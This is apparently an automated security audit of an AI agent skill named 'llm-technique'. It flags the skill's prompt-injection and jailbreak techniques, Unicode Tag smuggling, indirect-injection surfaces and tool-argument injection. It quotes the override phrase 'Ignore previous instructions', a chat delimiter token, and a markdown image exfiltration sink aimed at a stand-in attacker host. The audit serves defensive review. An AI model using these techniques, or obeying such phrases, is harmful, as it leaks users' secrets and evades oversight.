llm-technique

Warn

Audited by Gen Agent Trust Hub on Sep 5, 2026

Risk Level: MEDIUMPROMPT_INJECTIONOBFUSCATIONDATA_EXFILTRATIONINDIRECT_PROMPT_INJECTIONCOMMAND_EXECUTIONDYNAMIC_EXECUTION
Full Analysis
  • [PROMPT_INJECTION]: The skill documents a wide array of prompt injection and jailbreaking techniques designed to override system instructions and bypass alignment filters.
  • Evidence in SKILL.md: Explicit payloads for instruction override ("Ignore previous instructions"), role/delimiter termination ("", "<|im_end|>"), and refusal suppression patterns.
  • Evidence in references/prompt-injection-and-jailbreaks.md: In-depth templates for advanced techniques such as Skeleton Key (reframing safety policies), Crescendo (multi-turn escalation), and Many-shot jailbreaking (context poisoning).
  • [OBFUSCATION]: The skill provides functional code and examples for techniques used to hide malicious instructions from human review and simple keyword scanners.
  • Evidence in SKILL.md and references/prompt-injection-and-jailbreaks.md: Python snippets (to_tags, from_tags) for Unicode Tag smuggling (U+E0000..U+E007F), which hides text from UIs while remaining visible to the model.
  • Evidence in references/prompt-injection-and-jailbreaks.md: Documentation of homoglyph substitution (e.g., mixing Cyrillic characters into Latin words) and common encoding bypasses like Base64, Hex, and ROT13.
  • [DATA_EXFILTRATION]: The skill details multiple methods for exfiltrating sensitive data through agent-accessible channels.
  • Evidence in references/agent-and-mcp-abuse.md: Instructions for "Confused-deputy exfil sinks," including markdown image sinks (![](https://attacker.tld/x?d={{secret}})), DNS side channels using shell tools, and leaking data via outbound tool arguments.
  • [INDIRECT_PROMPT_INJECTION]: A systematic guide is provided for exploiting data sources that the agent ingests without direct user interaction.
  • Evidence in SKILL.md and references/agent-and-mcp-abuse.md: Analysis of injection surfaces across RAG documents (PDF, Office files), web pages (hidden HTML/CSS), emails, calendar events, and MCP tool responses.
  • [COMMAND_EXECUTION]: The skill identifies pathways to abuse tool-calling capabilities to perform unauthorized actions.
  • Evidence in references/agent-and-mcp-abuse.md: A "Tool-arg injection matrix" describing how to transition from LLM outputs into SQL injection, SSRF, path traversal, and command injection via vulnerable tool parameters.
  • [DYNAMIC_EXECUTION]: The skill includes Python scripts for generating adversarial payloads at runtime.
  • Evidence in references/prompt-injection-and-jailbreaks.md: Code for performing "Best-of-N" (BoN) perturbations to bypass safety filters and script generation for multi-modal image-based injections.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Sep 5, 2026, 10:40 PM
Security Audit — agent-trust-hub — llm-technique